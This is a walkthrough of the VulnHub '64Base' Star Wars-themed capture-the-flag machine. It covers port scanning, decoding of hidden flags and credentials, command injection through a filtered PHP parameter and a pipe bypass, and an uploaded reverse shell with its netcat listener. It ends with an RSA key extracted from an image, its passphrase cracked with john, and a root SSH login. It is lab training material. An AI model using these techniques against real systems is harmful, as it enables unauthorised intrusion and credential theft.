64Base: 1.0.1
Location
https://download.vulnhub.com/64base/64Base_3mrgnc3.ova
Introduction
Author: @3mrgnc3
This is the first public Boot2Root of this author. It’s intended to be more of a fun game than a serious hacking challenge. It is based on the StarWars storyline and is designed to troll you in a fun way. Before starting there is a friendly warning about being littered with more than a few “Red Herrings”.
The difficulty rating is beginner – intermediate.
The main goal is to capture 6 flags, each in the format of flag1{ZXhhbXBsZSBmbGFnCg==}.
Getting started
Starting with a nmap scan.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
┌─[n13mant@planetmars]─[~] └──╼ $nmap -A -T4 -sV -p- 192.168.171.3 Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 08:08 CET Nmap scan report for 192.168.171.3 Host is up (0.00045s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open tcpwrapped 80/tcp open http Apache httpd 2.4.10 ((Debian)) | http-robots.txt: 429 disallowed entries (15 shown) | /administrator/ /admin/ /login/ /88888/ /88888888/ | /88888888888/ /88888888888P/ /c3P08P/ /C3p0/ /A280/ /above/ /AC1/ |_/across/ /activation/ /Adjustments/ |_http-server-header: Apache/2.4.10 (Debian) |_http-title: 64base 4899/tcp open tcpwrapped 62964/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 59:a5:02:ba:72:8a:2e:c1:9c:ff:cc:b2:f8:15:66:b3 (DSA) | 2048 2a:57:2c:75:8c:34:9f:28:84:15:07:2a:be:d0:41:98 (RSA) |_ 256 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91 (ECDSA) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.65 seconds |
Looks like the website has a ‘robots.txt’, the SSH server is behind an alternate port and 2 ports are tcpwrapped. Let’s start with some banner grabbing.
|
1 2 3 4 5 6 7 8 9 |
┌─[n13mant@planetmars]─[~] └──╼ $curl -I 192.168.171.3:22 The programs included with the Fedora GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001 # |
A login from the future. 010.101.010.001……..binary perhaps? It should then read 2521. Another port? After a while I think there is nothing here and I get my first taste of some trolling.
|
1 2 3 4 5 6 7 8 9 10 11 |
┌─[n13mant@planetmars]─[~] └──╼ $curl -I 192.168.171.3:80 HTTP/1.1 200 OK Date: Tue, 03 Jan 2017 09:04:50 GMT Server: Apache/2.4.10 (Debian) Last-Modified: Tue, 06 Dec 2016 05:33:14 GMT ETag: "1fdf-542f6bd9b68a0" Accept-Ranges: bytes Content-Length: 8159 Vary: Accept-Encoding Content-Type: text/html |
Port 80 seems ok. Nothing special here.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $curl -I 192.168.171.3:4899 sshhh! ssh! droids! So.. You found a way in then... but, can you pop root? /~\ |oo ) Did you hear that? _\=/_ ___ / _ \ / ()\ //|/.\|\\ _|_____|_ \\ \_/ || | | === | | \|\ /| || |_| O |_| # _ _/ # || O || | | | ||__*__|| | | | |~ \___/ ~| []|[] /=\ /=\ /=\ | | | ________________[_]_[_]_[_]________/_]_[_\_________________________ |
Nice banner.
|
1 2 3 4 5 6 7 8 9 10 11 12 |
┌─[n13mant@planetmars]─[~] └──╼ $curl -I 192.168.171.3:62964 SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 Protocol mismatch. curl: (56) Recv failure: Connection reset by peer ┌─[✗]─[n13mant@planetmars]─[~] └──╼ $ssh 192.168.171.3 -p 62964 The authenticity of host '[192.168.171.3]:62964 ([192.168.171.3]:62964)' can't be established. ECDSA key fingerprint is SHA256:PhC0Efn/NWWhDzqb57DDh6SKn5feUean+PfxWhASzx4. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[192.168.171.3]:62964' (ECDSA) to the list of known hosts. n13mant@192.168.171.3's password: |
And no banner with the SSH server.
On to the webserver.
When I browse to the website I spot a string that looks like base64.
|
1 2 3 |
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $echo 'dmlldyBzb3VyY2UgO0QK' | base64 -d view source ;D |
Looks like I find the first ‘beginners hint’ LOL. In the source code I find a string that looks like hex. Time for another round of decoding.
|
1 2 3 |
┌─[n13mant@planetmars]─[~] └──╼ $echo '5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a' | xxd -r -p | base64 -d flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==} |
|
1 2 3 |
┌─[n13mant@planetmars]─[~] └──╼ $echo 'NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==' | base64 -d 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 |
Got my first flag which also could be a set of crendetials for further down the road.
When I look at the rest of the pages I noticed that there were some random placed words with indentation. When I collect these words and put them after each other, they form:
everybody with must die
With what? There wasn’t another word with the same indentation. So for now I move on.
On the
/post.html page there is a cool ASCII art poster with an interesting bottom.
A ‘real Imperial-Class BountyHunter’? Maybe a hint for changing my user-agent?
The rest of the pages didn’t look like they had something of value.
Next is the ‘robots.txt’. It’s a big list and from the looks of it, most pages are empty. To make things a bit more easy I copy the list from ‘robots.txt’ and paste them in a file. With the ‘cut’ command I remove the first 11 chars and run the file through wfuzz to eliminate the useless pages. As a result I get 2 pages that seem to be worth investigating.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
┌─[n13mant@planetmars]─[~] └──╼ $wfuzz -c -z file,/home/n13mant/Desktop/sw.lst --hc 404 --hw 0 http://192.168.171.3/FUZZ ******************************************************** * Wfuzz 2.1.3 - The Web Bruteforcer * ******************************************************** Target: http://192.168.171.3/FUZZ Total requests: 429 ================================================================== ID Response Lines Word Chars Request ================================================================== 00000: C=401 14 L 54 W 460 Ch "/admin/" ..." 00377: C=301 9 L 28 W 311 Ch "/ZZ" ..." Total time: 0.489533 Processed Requests: 429 Filtered Requests: 427 Requests/sec.: 876.3438 |
But after checking the complete result of the wfuzz scan I noticed that there where a lot of 404 (that’s why I filtered them in the first place). But why would there be 404 errors in a ‘robots.txt’ list? I re-run wfuzz, but this time focusing on the 404 errors.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
┌─[n13mant@planetmars]─[~] └──╼ $wfuzz -c -z file,/home/n13mant/Desktop/sw.lst --sc 404 http://192.168.171.3/FUZZ ******************************************************** * Wfuzz 2.1.3 - The Web Bruteforcer * ******************************************************** Target: http://192.168.171.3/FUZZ Total requests: 429 ================================================================== ID Response Lines Word Chars Request ================================================================== 00001: C=404 9 L 32 W 291 Ch "/administrator..." 00003: C=404 9 L 32 W 283 Ch "/login/" ..." 00147: C=404 9 L 32 W 283 Ch "/-HH--/" ..." 00166: C=404 9 L 32 W 280 Ch "/-l/" ..." 00202: C=404 9 L 32 W 280 Ch "/-o/" ..." 00203: C=404 9 L 32 W 283 Ch "/-nn--/" ..." 00205: C=404 9 L 32 W 294 Ch "/o88888/888888..." ..."8: C=404 9 L 32 W 288 Ch "/Office/r/s/" 00209: C=404 9 L 32 W 286 Ch "/Office/r/" ..." 00215: C=404 9 L 32 W 285 Ch "/oo/----/" ..." 00216: C=404 9 L 32 W 293 Ch "/o/-----------..." 00272: C=404 9 L 32 W 282 Ch "/-Row/" ..." 00324: C=404 9 L 32 W 295 Ch "/thousand/thou..." 00370: C=404 9 L 32 W 295 Ch "/XXXXX/XXXXX/X..." 00382: C=404 9 L 32 W 286 Ch "/office/s/" ..." 00392: C=404 9 L 32 W 292 Ch "/Imperial-clas..." Total time: 0.511337 Processed Requests: 429 Filtered Requests: 413 Requests/sec.: 838.9754 |
(Another way of doing this was to spider the site with burpsuite. Should give a similar result.)
Because I’m getting nowhere with the 404 results, I start with the found admin site. Maybe the clues and credentials I collected earlier will pay off.
I used the credentials from flag1, but that didn’t work. So I tried it again, but this time with the clue about being an imperial-class bountyhunter. After I changed my user-agent and try to log in again it still wouldn’t let me in. Guess I was missing something.
Being stuck at the moment I went over my notes and after a while (a long while), I noticed that the use of the word Imperial-Class in the clue and in the ‘robots.txt’ list where slightly different. It was a difference in just 1 letter – lower case / upper case.
With the use of cURL I checked the folder ‘/Imperial-Class/’ and this time I got more information.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
┌─[n13mant@planetmars]─[~] └──╼ $curl -vv 192.168.171.3/Imperial-Class/ * Trying 192.168.171.3... * Connected to 192.168.171.3 (192.168.171.3) port 80 (#0) > GET /Imperial-Class/ HTTP/1.1 > Host: 192.168.171.3 > User-Agent: curl/7.50.1 > Accept: */* > < HTTP/1.1 401 Unauthorized < Date: Tue, 03 Jan 2017 09:56:26 GMT < Server: Apache/2.4.10 (Debian) < WWW-Authenticate: Basic realm="Authorization Required" < Content-Length: 460 < Content-Type: text/html; charset=iso-8859-1 < <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>401 Unauthorized</title> </head><body> <h1>Unauthorized</h1> <p>This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.</p> <hr> <address>Apache/2.4.10 (Debian) Server at 192.168.171.3 Port 80</address> </body></html> * Connection #0 to host 192.168.171.3 left intact |
Another login site. The found credentials worked just fine.
Checking the source code it seems I was still missing something.
|
1 |
<!-- don't forget the BountyHunter login --> |
To help me with my search I used cewl to create a wordlist from all the words on the mainsite and ran it through dirb.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
┌─[n13mant@planetmars]─[~] └──╼ $dirb http://192.168.171.3/Imperial-Class/ /home/n13mant/Desktop/sw-list.txt -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue Jan 3 12:21:55 2017 URL_BASE: http://192.168.171.3/Imperial-Class/ WORDLIST_FILES: /home/n13mant/Desktop/sw-list.txt AUTHORIZATION: 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 ----------------- GENERATED WORDS: 672 ---- Scanning URL: http://192.168.171.3/Imperial-Class/ ---- ==> DIRECTORY: http://192.168.171.3/Imperial-Class/BountyHunter/ ---- Entering directory: http://192.168.171.3/Imperial-Class/BountyHunter/ ---- ----------------- END_TIME: Tue Jan 3 12:21:57 2017 DOWNLOADED: 1344 - FOUND: 0 |
As the comment said……wow.
When I check the source code of ‘/login.php/’ I get some additional information.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
<body bgcolor=#000000><font color=#cfbf00> <form name="login-form" id="login-form" method="post" action="./login.php"> <fieldset> <legend>Please login:</legend> <dl> <dt> <label title="Username">Username: <input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" /> </label> </dt> </dl> <dl> <dt> <label title="Password">Password: <input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" /> </label> </dt> </dl> <dl> <dt> <label title="Submit"> <input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" /> <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a --> </label> </dt> </dl> </fieldset> </form> |
3 hex strings.
|
1 2 3 4 5 6 |
┌─[n13mant@planetmars]─[~] └──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756' | xxd -r -p ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWV ┌─[n13mant@planetmars]─[~] └──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756' | xxd -r -p | base64 -d flag2{aHR0cHM6Ly93d3cuebase64: invalid input |
Looks like I have 1 part of the entire string. After I copied them together I got the second flag.
|
1 2 3 4 5 6 |
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a ' | xxd -r -p | base64 -d flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=} ┌─[n13mant@planetmars]─[~] └──╼ $echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=' | base64 -d https://www.youtube.com/watch?v=vJwytFWA8uA |
Time for some videos on YouTube.
Darth Vader belching……..didn’t see that one coming. Nice way of saying I need to use burpsuite.
When I login with the same credentials as before I get the third flag.
The decoded content of the third flag looked like something I’ve already seen in a previous hint
(IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377).
And there is the fourth flag thanks to remote code execution.
flag4{64base:64base5h377}
Looks like more credentials.
There are a few commands I can execute like ps, netstat, ls. This way I can get some information about the system.
|
1 2 3 4 5 6 7 8 9 |
Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:62964 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:4899 0.0.0.0:* LISTEN - tcp6 0 0 :::62964 :::* LISTEN - tcp6 0 0 ::1:25 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN |
When I try to use netcat I get another troll.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░ ░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░ ░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░ ░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░ ░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░ ░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░ ░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░ ░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░ ░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░ ░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░ ░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░ ░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░ ░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░ ░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░ ░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░ ░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░ ░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░ ░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░ ░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░ ░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█ ░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█ Is this the net cat you are looking for? |
Later on I found out there was another command I could use, namely
wget.
With this command I tried to upload a test file onto the machine. But that didn’t worked out so well. After a while it was clear that there was a filter in place. But what kind I didn’t know….yet.
Because the ‘f’ parameter could run several functions (e.g. exec, system) I tried the function ‘var_dump’. This function is used to display structured information about variables. With it I can hopefully find out what chars are being filtered.
Bummer. Looks like all the used chars got filtered. I need to find a bypass. The only char that isn’t getting filtered is the ‘|’ (pipe) char. And because it looks like I’m stuck inside this ’64base’ binary file, I need to break out and execute the ‘wget’ command to upload a file to the remote system.
When trying the ‘uname’ command it wouldn’t work because I was trapped in the 64base file. But because of the pipe char not being filtered I could tried to use this char to get myself out and with success.
Now to upload a reverse shell script onto the machine. For this I used the reverse shell script from pentestmonkey. After uploading it to the system and running it I got a shell.
|
1 2 3 4 5 6 7 8 9 10 |
┌─[n13mant@planetmars]─[~] └──╼ $nc -lvnp 31337 listening on [any] 31337 ... connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 53825 Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux 06:20:22 up 23:29, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
www-data@64base:/64base$ strings well_done_:D strings well_done_:D sshhh! ssh! droids! So.. You found a way in then... but, can you pop root? /~\ |oo ) Did you hear that? _\=/_ ___ / _ \ / ()\ //|/.\|\\ _|_____|_ \\ \_/ || | | === | | \|\ /| || |_| O |_| # _ _/ # || O || | | | ||__*__|| | | | |~ \___/ ~| []|[] /=\ /=\ /=\ | | | ________________[_]_[_]_[_]________/_]_[_\_________________________ |
Found the troll from earlier.
And when using the more function I get trolled again 🙂
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
www-data@64base:~/html$ ls -aRl | more ls -aRl | more ███╗ ███╗ ██████╗ ██████╗ ███████╗██████╗ ████╗ ████║██╔═══██╗██╔══██╗██╔════╝╚════██╗ ██╔████╔██║██║ ██║██████╔╝█████╗ ▄███╔╝ ██║╚██╔╝██║██║ ██║██╔══██╗██╔══╝ ▀▀══╝ ██║ ╚═╝ ██║╚██████╔╝██║ ██║███████╗ ██╗ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ███╗ ███╗ ██████╗ ██████╗ ██████╗ ███████╗██╗██╗ ████╗ ████║██╔═══██╗██╔══██╗██╔══██╗██╔════╝██║██║ ██╔████╔██║██║ ██║██████╔╝██████╔╝█████╗ ██║██║ ██║╚██╔╝██║██║ ██║██╔══██╗██╔══██╗██╔══╝ ╚═╝╚═╝ ██║ ╚═╝ ██║╚██████╔╝██║ ██║██║ ██║███████╗██╗██╗ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝╚═╝ ██╗ ██╗ ██████╗ ██╗ ██╗ ██╗ ██╗ █████╗ ███╗ ██╗████████╗ ╚██╗ ██╔╝██╔═══██╗██║ ██║ ██║ ██║██╔══██╗████╗ ██║╚══██╔══╝ ╚████╔╝ ██║ ██║██║ ██║ ██║ █╗ ██║███████║██╔██╗ ██║ ██║ ╚██╔╝ ██║ ██║██║ ██║ ██║███╗██║██╔══██║██║╚██╗██║ ██║ ██║ ╚██████╔╝╚██████╔╝ ╚███╔███╔╝██║ ██║██║ ╚████║ ██║ ╚═╝ ╚═════╝ ╚═════╝ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ███╗ ███╗ ██████╗ ██████╗ ███████╗██╗██╗██████╗ ████╗ ████║██╔═══██╗██╔══██╗██╔════╝██║██║╚════██╗ ██╔████╔██║██║ ██║██████╔╝█████╗ ██║██║ ▄███╔╝ ██║╚██╔╝██║██║ ██║██╔══██╗██╔══╝ ╚═╝╚═╝ ▀▀══╝ ██║ ╚═╝ ██║╚██████╔╝██║ ██║███████╗██╗██╗ ██╗ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝╚═╝ ╚═╝ ls: write error: Broken pipe |
After some more searching I found flag number 5.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
www-data@64base:~/html$ cd .admin cd .admin bash: cd: .admin: No such file or directory www-data@64base:~/html$ cd ./admin cd ./admin www-data@64base:~/html/admin$ ls -lah ls -lah total 28K drwxr-xr-x 3 www-data www-data 4.0K Dec 6 03:00 . drwxr-xr-x 431 www-data www-data 12K Dec 6 02:41 .. -rw-r--r-- 1 www-data www-data 113 Dec 6 02:25 .htaccess drwxr-xr-x 2 root root 4.0K Dec 6 03:00 S3cR37 -rwxr-xr-x 1 www-data www-data 139 Nov 30 07:02 index.php www-data@64base:~/html/admin$ cd S3cR37 cd S3cR37 www-data@64base:~/html/admin/S3cR37$ ls -lah ls -lah total 200K drwxr-xr-x 2 root root 4.0K Dec 6 03:00 . drwxr-xr-x 3 www-data www-data 4.0K Dec 6 03:00 .. -------r-- 1 root root 192K Nov 30 11:31 flag5{TG9vayBJbnNpZGUhIDpECg==} www-data@64base:~/html/admin/S3cR37$ echo TG9vayBJbnNpZGUhIDpECg== | base64 -d <n/S3cR37$ echo TG9vayBJbnNpZGUhIDpECg== | base64 -d Look Inside! :D |
|
1 2 3 |
www-data@64base:~/html/admin/S3cR37$ file flag5{TG9vayBJbnNpZGUhIDpECg==} file flag5{TG9vayBJbnNpZGUhIDpECg==} flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3 |
A picture. I could try and download it to my machine, but instead I use strings and found a big string at the top that looks like hex. After some decoding I get base64 and when I’ve decoded that I get a RSA private key.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6 YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0 kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP -----END RSA PRIVATE KEY----- |
The only thing I haven’t tried is the ssh server on port 62964.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
┌─[n13mant@planetmars]─[~] └──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey The authenticity of host '[192.168.171.4]:62964 ([192.168.171.4]:62964)' can't be established. ECDSA key fingerprint is SHA256:PhC0Efn/NWWhDzqb57DDh6SKn5feUean+PfxWhASzx4. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[192.168.171.4]:62964' (ECDSA) to the list of known hosts. @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for './Desktop/sshkey' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "./Desktop/sshkey": bad permissions root@192.168.171.4's password: |
Wrong permission.
|
1 2 3 4 5 |
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $chmod 400 ./Desktop/sshkey ┌─[n13mant@planetmars]─[~] └──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey Enter passphrase for key './Desktop/sshkey': |
A passphrase. Time for some cracking.
Because I need a properly formatted password hash I use ‘ssh2john’ to extract the password hash from the private key.
|
1 2 |
┌─[n13mant@planetmars]─[~/Desktop] └──╼ $ssh2john sshkey > converted_key |
Now to load up the file into John password cracker and use the well known rockyou wordlist to hopefully crack the password.
|
1 2 3 4 5 6 7 8 9 |
┌─[✗]─[n13mant@planetmars]─[~/Desktop] └──╼ $john converted_key --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA 32/64]) Press 'q' or Ctrl-C to abort, almost any other key for status usetheforce (sshkey) 1g 0:00:00:01 DONE (2017-01-05 15:48) 0.8196g/s 467452p/s 467452c/s 467452C/s usetheforce Use the "--show" option to display all of the cracked passwords reliably Session completed |
And after a split second I got the password being
usetheforce.
For this task i also could have used Phrasen|drescher instead. But John worked out just fine.
|
1 2 3 4 5 |
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey Enter passphrase for key './Desktop/sshkey': Last login: Tue Dec 6 05:40:07 2016 from 172.16.0.18 flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK} |
After some final trolling I get the 6th and final flag.
|
1 2 3 4 5 6 7 8 9 10 |
